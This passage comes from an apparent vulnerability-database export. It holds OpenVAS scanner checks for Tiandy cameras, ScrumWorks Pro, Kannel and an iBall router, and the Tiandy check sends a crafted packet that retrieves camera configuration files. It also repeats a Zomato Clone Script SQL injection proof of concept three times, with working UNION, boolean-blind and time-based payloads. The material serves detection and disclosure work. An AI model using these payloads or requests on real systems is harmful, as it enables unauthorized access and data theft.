10055 2018-06-04 04:44:00Z ckuersteiner $\n#\n# Tiandy IP cameras Sensitive Information Disclosure Vulnerability\n#\n# Authors:\n# Tameem Eissa <tameem.eissa@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.107183\");\n script_version(\"$Revision: 10055 $\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-06-04 06:44:00 +0200 (Mon, 04 Jun 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-10-04 16:39:44 +0530 (Wed, 04 Oct 2017)\");\n script_cve_id(\"CVE-2017-15236\");\n script_name(\"Tiandy IP cameras Sensitive Information Disclosure Vulnerability\");\n\n script_tag(name:\"summary\", value:\"A Tiandy IP Camera is running on this host and is prone to a sensitive information disclosure vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Sends a crafted packet using sockets and check the response.\");\n\n script_tag(name:\"insight\", value:\"Tiandy uses a proprietary protocol, a flaw in the protocol allows an attacker to forge a request that will return configuration settings of the Tiandy IP camera.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker to download the following files:\n\n- config_server.ini\n\n- extendword.txt\n\n- config_ptz.dat\n\n- config_right.dat\n\n- config_dg.dat\n\n- config_burn.dat.\");\n\n script_tag(name:\"affected\", value:\"Tiandy IP cameras version 5.56.17.120.\");\n\n script_tag(name:\"solution\", value:\"No known solution is available as of 04th June, 2018. Information regarding\nthis issue will be updated once solution details are available.\");\n\n script_tag(name:\"qod_type\", value:\"remote_active\");\n\n script_tag(name:\"solution_type\", value:\"NoneAvailable\");\n\n script_xref(name:\"URL\", value:\"https://blogs.securiteam.com/index.php/archives/3444\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\");\n\n script_family(\"General\");\n script_require_ports(\"Services/unknown\", 3001);\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\n\nfunction tiandy_recv( soc )\n{\n r = recv( socket:soc, length: 1024 );\n\n if( ! r || strlen( r ) < 1024 ) return;\n len = ord( r[7] );\n if( ! len || len < 1 ) return r;\n r += recv( socket:soc, length:len );\n\n return r;\n\n}\n\nport = get_unknown_port(default:3001);\n\nip = get_host_ip();\n\nif(! soc = open_sock_tcp(port)) exit(0);\n\nreq = raw_string(0x74, 0x1f, 0x4a, 0x84, 0xc8, 0xa8, 0xe4, 0xb3,\n 0x18, 0x7f, 0xd2, 0x21, 0x08, 0x00, 0x45, 0x00,\n 0x00, 0xcc, 0x3e, 0x9a, 0x40, 0x00, 0x40, 0x06,\n 0xd4, 0x13, 0xac, 0x10, 0x65, 0x75, 0x6e, 0x31,\n 0xa7, 0xc7, 0x43, 0x5b, 0x0b, 0xb9, 0x85, 0xbc,\n 0x1d, 0xf0, 0x5b, 0x3e, 0xe8, 0x32, 0x50, 0x18,\n 0x7f, 0xa4, 0xc6, 0xcf, 0x00, 0x00, 0xf1, 0xf5,\n 0xea, 0xf5, 0x74, 0x00, 0xa4, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x90, 0x00) + ip +\n raw_string(0x09, 0x50, 0x52, 0x4f, 0x58, 0x59, 0x09, 0x43,\n 0x4d, 0x44, 0x09, 0x44, 0x48, 0x09, 0x43, 0x46,\n 0x47, 0x46, 0x49, 0x4c, 0x45, 0x09, 0x44, 0x4f,\n 0x57, 0x4e, 0x4c, 0x4f, 0x41, 0x44, 0x09, 0x36,\n 0x09, 0x63, 0x6f, 0x6e, 0x66, 0x69, 0x67, 0x5f,\n 0x73, 0x65, 0x72, 0x76, 0x65, 0x72, 0x2e, 0x69,\n 0x6e, 0x69, 0x09, 0x65, 0x78, 0x74, 0x65, 0x6e,\n 0x64, 0x77, 0x6f, 0x72, 0x64, 0x2e, 0x74, 0x78,\n 0x74, 0x09, 0x63, 0x6f, 0x6e, 0x66, 0x69, 0x67,\n 0x5f, 0x70, 0x74, 0x7a, 0x2e, 0x64, 0x61, 0x74,\n 0x09, 0x63, 0x6f, 0x6e, 0x66, 0x69, 0x67, 0x5f,\n 0x72, 0x69, 0x67, 0x68, 0x74, 0x2e, 0x64, 0x61,\n 0x74, 0x09, 0x63, 0x6f, 0x6e, 0x66, 0x69, 0x67,\n 0x5f, 0x64, 0x67, 0x2e, 0x64, 0x61, 0x74, 0x09,\n 0x63, 0x6f, 0x6e, 0x66, 0x69, 0x67, 0x5f, 0x62,\n 0x75, 0x72, 0x6e, 0x2e, 0x64, 0x61, 0x74, 0x0a,\n 0x0a, 0x0a);\n\n\nsend (socket:soc, data:req);\nmax = 0;\n\nwhile(TRUE)\n{\n max+= 1;\n if (max >= 10) break;\n x = tiandy_recv(soc:soc);\n\n if (!x) break;\n res += x;\n len = strlen(x);\n\n if(x[len-1] == raw_string( 0x20 ) && x[len-2] == raw_string( 0x20 ) && x[len-3] == raw_string( 0x20 ) && x[len-4] == raw_string( 0x5d ) && x[len-5] == raw_string( 0x33 ) && x[len-6] == raw_string( 0x6d ) && x[len-7] == raw_string( 0x6f ) && x[len-8] == raw_string( 0x63 )) break;\n\n}\n\n\nif (\"kTiandy\" >< res && \"config_server.ini\" >< res && \"extendword.txt\" >< res && \"[log]\" >< res)\n{\n close (soc);\n\n report = 'By sending a special request, it was possible to disclose the content of the config_server.ini file : \\n';\n\n report+= res;\n\n security_message(port: port, data: report);\n exit(0);\n\n}\n\nif (soc) close (soc);\n\nexit (99);\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-06-05T13:20:40", "references": ["https://blogs.securiteam.com/index.php/archives/3387"], "pluginID": "1361412562310107181", "description": "The host is installed with ScrumWorks Pro and is prone to Remote\n Code Execution Vulnerability.", "edition": 7, "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "published": "2017-09-25T00:00:00", "title": "ScrumWorks Pro Remote Code Execution Vulnerability", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": [], "modified": "2018-06-04T00:00:00", "id": "OPENVAS:1361412562310107181", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310107181", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_scrumworkpro_rce.nasl 10055 2018-06-04 04:44:00Z ckuersteiner $\n#\n# ScrumWorks Pro Remote Code Execution Vulnerability\n#\n# Authors:\n# Tameem Eissa <tameem.eissa@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:collabnet:scrumworkspro';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.107181\");\n script_version(\"$Revision: 10055 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-06-04 06:44:00 +0200 (Mon, 04 Jun 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-25 13:57:36 +0200 (Mon, 25 Sep 2017)\");\n\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_name(\"ScrumWorks Pro Remote Code Execution Vulnerability\");\n\n script_tag(name: \"summary\", value: \"The host is installed with ScrumWorks Pro and is prone to Remote\n Code Execution Vulnerability.\");\n\n script_tag(name: \"vuldetect\", value: \"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name: \"insight\", value: \"ScrumWorks Pro is prone to remote code execution vulnerability due\n to unsafe deserialization of bytes on the server side which lead to java deserialization attack.\");\n\n script_tag(name: \"impact\" , value: \"Remote attacker is able to execute arbitrary code with the\n permissions of the ScrumWorks application server.\");\n\n script_tag(name: \"affected\", value: \"ScrumWorks Pro version 6.7.0\");\n\n script_tag(name: \"solution\", value: \"No known solution is available as of 04th June, 2018. Information regarding\nthis issue will be updated once solution details are available.\");\n\n script_xref(name: \"URL\" , value: \"https://blogs.securiteam.com/index.php/archives/3387\");\n\n script_tag(name:\"solution_type\", value:\"NoneAvailable\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n\n script_family(\"Web application abuses\");\n\n script_dependencies(\"gb_scrumworkspro_detect.nasl\");\n\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"scrumworkspro/installed\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!Port = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!Ver = get_app_version(cpe:CPE, port:Port)){\n exit(0);\n}\n\nif(version_is_equal(version:Ver, test_version:\"6.7.0\")){\n report = report_fixed_ver(installed_version:Ver, fixed_version:\"None Available\");\n security_message(port:Port, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-09-01T23:44:27", "references": ["https://redmine.kannel.org/issues/771"], "pluginID": "1361412562310140386", "description": "Kannel is prone to a privilege escalation vulnerability.", "edition": 8, "reporter": "This script is Copyright (C) 2017 Greenbone Networks GmbH", "published": "2017-09-21T00:00:00", "title": "Kannel Privilege Escalation Vulnerability", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "General", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14609"], "modified": "2018-05-18T00:00:00", "id": "OPENVAS:1361412562310140386", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_kannel_priv_esc_vuln.nasl 9895 2018-05-18 04:24:05Z ckuersteiner $\n#\n# Kannel Privilege Escalation Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:kannel:kannel';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140386\");\n script_version(\"$Revision: 9895 $\");\n script_tag(name: \"last_modification\", value: \"$Date: 2018-05-18 06:24:05 +0200 (Fri, 18 May 2018) $\");\n script_tag(name: \"creation_date\", value: \"2017-09-21 15:08:29 +0700 (Thu, 21 Sep 2017)\");\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2017-14609\");\n\n script_tag(name: \"qod_type\", value: \"remote_banner_unreliable\");\n\n script_tag(name: \"solution_type\", value: \"NoneAvailable\");\n\n script_name(\"Kannel Privilege Escalation Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_kannel_detect.nasl\");\n script_mandatory_keys(\"kannel/installed\");\n\n script_tag(name: \"summary\", value: \"Kannel is prone to a privilege escalation vulnerability.\");\n\n script_tag(name: \"vuldetect\", value: \"Checks the version.\");\n\n script_tag(name: \"insight\", value: \"The server daemons create a PID file after dropping privileges to a\nnon-root account, which might allow local users to kill arbitrary processes by leveraging access to this\nnon-root account for PID file modification before a root script executes a 'kill `cat /pathname`' command, as\ndemonstrated by bearerbox.\");\n\n script_tag(name: \"affected\", value: \"Kannel version 1.5.0 and prior.\");\n\n script_tag(name: \"solution\", value: \"No known solution is available as of 18th May, 2018. Information regarding\nthis issue will be updated once solution details are available.\");\n\n script_xref(name: \"URL\", value: \"https://redmine.kannel.org/issues/771\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE))\n exit(0);\n\nif (version =~ \"^svn\") {\n if (version_is_less_equal(version: version, test_version: \"svn-r5179\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"None\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\nelse {\n if (version_is_less_equal(version: version, test_version: \"1.5.0\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"None\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nexit(0);\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:41:48", "references": ["https://www.exploit-db.com/exploits/42740", "https://www.exploit-db.com/exploits/42591", "http://seclists.org/fulldisclosure/2017/Mar/22"], "pluginID": "1361412562310811313", "description": "The host is running iBall Baton 150M\n Wireless Router and is prone to authentication bypass vulnerability.", "edition": 9, "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "published": "2017-08-31T00:00:00", "title": "iBall Baton 150M Wireless Router Authentication Bypass Vulnerability", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-6558", "CVE-2017-14244"], "modified": "2018-05-18T00:00:00", "id": "OPENVAS:1361412562310811313", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811313", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_iball_baton_150m_wireless_router_auth_bypass_vuln.nasl 9895 2018-05-18 04:24:05Z ckuersteiner $\n#\n# iBall Baton 150M Wireless Router Authentication Bypass Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:iball:baton_150m_wireless-n_router\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811313\");\n script_version(\"$Revision: 9895 $\");\n script_cve_id(\"CVE-2017-6558\", \"CVE-2017-14244\");\n script_bugtraq_id(96822);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-05-18 06:24:05 +0200 (Fri, 18 May 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-31 12:06:39 +0530 (Thu, 31 Aug 2017)\");\n script_tag(name:\"qod_type\", value:\"exploit\");\n script_name(\"iBall Baton 150M Wireless Router Authentication Bypass Vulnerability\");\n\n script_tag(name: \"summary\" , value:\"The host is running iBall Baton 150M\n Wireless Router and is prone to authentication bypass vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted request via HTTP GET and\n check whether it is able to get specific information or not.\");\n\n script_tag(name: \"insight\" , value:\"Multiple flaws are due to,\n\n - iball Baton 150M Router login page is insecurely developed and any attacker\n could bypass the admin authentication just by tweaking the password.cgi file.\n\n - iBall ADSL2+ Home Router does not properly authenticate when pages are\n accessed through cgi version.\");\n\n script_tag(name: \"impact\" , value:\"Successful exploitation will allow remote\n attackers to gain access to bypass authentication mechanism and perform\n unauthorized actions and can access sensitive information and perform actions\n such as reset router, downloading backup configuration, upload backup etc.\n This may lead to further attacks. \n\n Impact Level: System/Application\");\n\n script_tag(name: \"affected\" , value:\"\n iBall Baton 150M Wireless-N ADSI.2+ Router 1.2.6 build 110401.\n iBall ADSL2+ Home Router WRA150N Firmware version FW_iB-LR7011A_1.0.2\");\n\n script_tag(name: \"solution\" , value:\"No known solution is available as of 18th May, 2018. Information regarding\nthis issue will be updated once solution details are available.\");\n\n script_tag(name:\"solution_type\", value:\"NoneAvailable\");\n\n script_xref(name : \"URL\" , value : \"https://www.exploit-db.com/exploits/42591\");\n script_xref(name : \"URL\" , value : \"https://www.exploit-db.com/exploits/42740\");\n script_xref(name : \"URL\" , value : \"http://seclists.org/fulldisclosure/2017/Mar/22\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_iball_baton_150m_wireless_router_detect.nasl\");\n script_mandatory_keys(\"iBall_Baton_150M_Router/detected\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif(!netPort = get_app_port(cpe:CPE))\n exit(0);\n\nurl = \"/password.cgi\";\n\nreq = http_get(item: url, port:netPort);\nrcvRes = http_keepalive_send_recv(port:netPort, data:req);\n\nif(rcvRes =~ \"HTTP/1.. 200\" && \">Access Control -- Password<\" >< rcvRes && \n \"Access to your DSL router\" >< rcvRes && \"pwdAdmin =\" >< rcvRes &&\n \"pwdSupport =\" >< rcvRes && \"pwdUser =\" >< rcvRes)\n{\n report = report_vuln_url(port:netPort, url:url);\n security_message( port:netPort, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-02-17T21:26:16", "references": [], "description": "Exploit for php platform in category web applications", "edition": 1, "reporter": "Ihsan Sencan", "published": "2017-10-30T00:00:00", "title": "Zomato Clone Script - resid SQL Injection Vulnerability", "type": "zdt", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-15993"], "modified": "2017-10-30T00:00:00", "href": "https://0day.today/exploit/description/28894", "id": "1337DAY-ID-28894", "sourceData": "# # # # # \r\n# Exploit Title: Zomato Clone Script - SQL Injection\r\n# Dork: N/A\r\n# Date: 30.10.2017\r\n# Vendor Homepage: http://www.phpscriptsmall.com/\r\n# Software Link: http://www.exclusivescript.com/product/099S4111872/php-scripts/zomato-clone-script\r\n# Demo: http://jhinstitute.com/demo/foodpanda/\r\n# Version: N/A\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2017-15993\r\n# # # # #\r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Social: @ihsansencan\r\n# # # # #\r\n# Description:\r\n# The vulnerability allows an attacker to inject sql commands....\r\n# \r\n# Proof of Concept: \r\n# \r\n# http://localhost/[PATH]/restaurant-menu.php?resid=[SQL]\r\n# \r\n# -539'+++/*!02222UNION*/+/*!02222SELECT*/+0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x3130,(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)[email\u00a0protected]:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),0x3132,0x3133,0x3134--+-\r\n# \r\n# Parameter: resid (GET)\r\n# Type: boolean-based blind\r\n# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)\r\n# Payload: resid=-9239 OR 3532=3532#\r\n# \r\n# Type: AND/OR time-based blind\r\n# Title: MySQL >= 5.0.12 AND time-based blind\r\n# Payload: resid=539 AND SLEEP(5)\r\n# \r\n# Type: UNION query\r\n# Title: MySQL UNION query (87) - 10 columns\r\n# Payload: resid=539 UNION ALL SELECT 87,87,87,87,87,CONCAT(0x7170767071,0x7368446c664e5950484e757a6b4b5a616972446f41484d74485874656e476369647a774865767369,0x7176766b71),87,87,87,87#\r\n# \r\n# Etc..\r\n# # # # #\n\n# 0day.today [2018-02-17] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/28894"}], "packetstorm": [{"lastseen": "2017-10-30T22:00:35", "references": [], "description": "", "edition": 1, "reporter": "Ihsan Sencan", "published": "2017-10-30T00:00:00", "title": "Zomato Clone Script SQL Injection", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "packetstorm", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-15993"], "modified": "2017-10-30T00:00:00", "href": "https://packetstormsecurity.com/files/144800/Zomato-Clone-Script-SQL-Injection.html", "id": "PACKETSTORM:144800", "sourceData": "`# # # # # \n# Exploit Title: Zomato Clone Script - SQL Injection \n# Dork: N/A \n# Date: 30.10.2017 \n# Vendor Homepage: http://www.phpscriptsmall.com/ \n# Software Link: http://www.exclusivescript.com/product/099S4111872/php-scripts/zomato-clone-script \n# Demo: http://jhinstitute.com/demo/foodpanda/ \n# Version: N/A \n# Category: Webapps \n# Tested on: WiN7_x64/KaLiLinuX_x64 \n# CVE: CVE-2017-15993 \n# # # # # \n# Exploit Author: Ihsan Sencan \n# Author Web: http://ihsan.net \n# Author Social: @ihsansencan \n# # # # # \n# Description: \n# The vulnerability allows an attacker to inject sql commands.... \n# \n# Proof of Concept: \n# \n# http://localhost/[PATH]/restaurant-menu.php?resid=[SQL] \n# \n# -539'+++/*!02222UNION*/+/*!02222SELECT*/+0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x3130,(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),0x3132,0x3133,0x3134--+- \n# \n# Parameter: resid (GET) \n# Type: boolean-based blind \n# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) \n# Payload: resid=-9239 OR 3532=3532# \n# \n# Type: AND/OR time-based blind \n# Title: MySQL >= 5.0.12 AND time-based blind \n# Payload: resid=539 AND SLEEP(5) \n# \n# Type: UNION query \n# Title: MySQL UNION query (87) - 10 columns \n# Payload: resid=539 UNION ALL SELECT 87,87,87,87,87,CONCAT(0x7170767071,0x7368446c664e5950484e757a6b4b5a616972446f41484d74485874656e476369647a774865767369,0x7176766b71),87,87,87,87# \n# \n# Etc.. \n# # # # # \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/144800/zomatoclone-sql.txt"}], "exploitdb": [{"lastseen": "2017-10-30T18:31:14", "osvdbidlist": [], "references": [], "description": "Zomato Clone Script - 'resid' SQL Injection. CVE-2017-15993. Webapps exploit for PHP platform", "edition": 1, "reporter": "Exploit-DB", "published": "2017-10-30T00:00:00", "title": "Zomato Clone Script - 'resid' SQL Injection", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-15993"], "modified": "2017-10-30T00:00:00", "href": "https://www.exploit-db.com/exploits/43066/", "id": "EDB-ID:43066", "sourceData": "# # # # # \r\n# Exploit Title: Zomato Clone Script - SQL Injection\r\n# Dork: N/A\r\n# Date: 30.10.2017\r\n# Vendor Homepage: http://www.phpscriptsmall.com/\r\n# Software Link: http://www.exclusivescript.com/product/099S4111872/php-scripts/zomato-clone-script\r\n# Demo: http://jhinstitute.com/demo/foodpanda/\r\n# Version: N/A\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2017-15993\r\n# # # # #\r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Social: @ihsansencan\r\n# # # # #\r\n# Description:\r\n# The vulnerability allows an attacker to inject sql commands....\r\n# \r\n# Proof of Concept: \r\n# \r\n# http://localhost/[PATH]/restaurant-menu.php?resid=[SQL]\r\n# \r\n# -539'+++/*!02222UNION*/+/*!02222SELECT*/+0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x3130,(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),0x3132,0x3133,0x3134--+-\r\n# \r\n# Parameter: resid (GET)\r\n# Type: boolean-based blind\r\n# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)\r\n# Payload: resid=-9239 OR 3532=3532#\r\n# \r\n# Type: AND/OR time-based blind\r\n# Title: MySQL >= 5.0.12 AND time-based blind\r\n# Payload: resid=539 AND SLEEP(5)\r\n# \r\n# Type: UNION query\r\n# Title: MySQL UNION query (87) - 10 columns\r\n# Payload: resid=539 UNION ALL SELECT 87,87,87,87,87,CONCAT(0x7170767071,0x7368446c664e5950484e757a6b4b5a616972446f41484d74485874656e476369647a774865767369,0x7176766b71),87,87,87,87#\r\n# \r\n# Etc..\r\n# # # # #\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43066/"}], "nessus": [{"lastseen": "2018-09-01T23:38:52", "references": ["https://lists.debian.org/debian-lts-announce/2017/05/msg00033.html", "https://packages.debian.org/source/wheezy/exiv2"], "pluginID": "100482", "description": "It was discovered that the exiv2 library fails to parse some crafted tiff images, leading to denial of service via application crash.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 0.23-1+deb7u1.\n\nWe recommend that you upgrade your exiv2 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 10, "reporter": "Tenable", "published": "2017-05-30T00:00:00", "title": "Debian DLA-963-1 : exiv2 security update", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9239"], "modified": "2018-07-10T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:exiv2", "p-cpe:/a:debian:debian_linux:libexiv2-dev", "p-cpe:/a:debian:debian_linux:libexiv2-doc", "cpe:/o:debian:debian_linux:7.0", "p-cpe:/a:debian:debian_linux:libexiv2-12", "p-cpe:/a:debian:debian_linux:libexiv2-dbg"], "id": "DEBIAN_DLA-963.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=100482", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-963-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100482);\n script_version(\"3.6\");\n script_cvs_date(\"Date: 2018/07/10 12:45:04\");\n\n script_cve_id(\"CVE-2017-9239\");\n\n script_name(english:\"Debian DLA-963-1 : exiv2 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the exiv2 library fails to parse some crafted\ntiff images, leading to denial of service via application crash.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n0.23-1+deb7u1.\n\nWe recommend that you upgrade your exiv2 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/05/msg00033.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 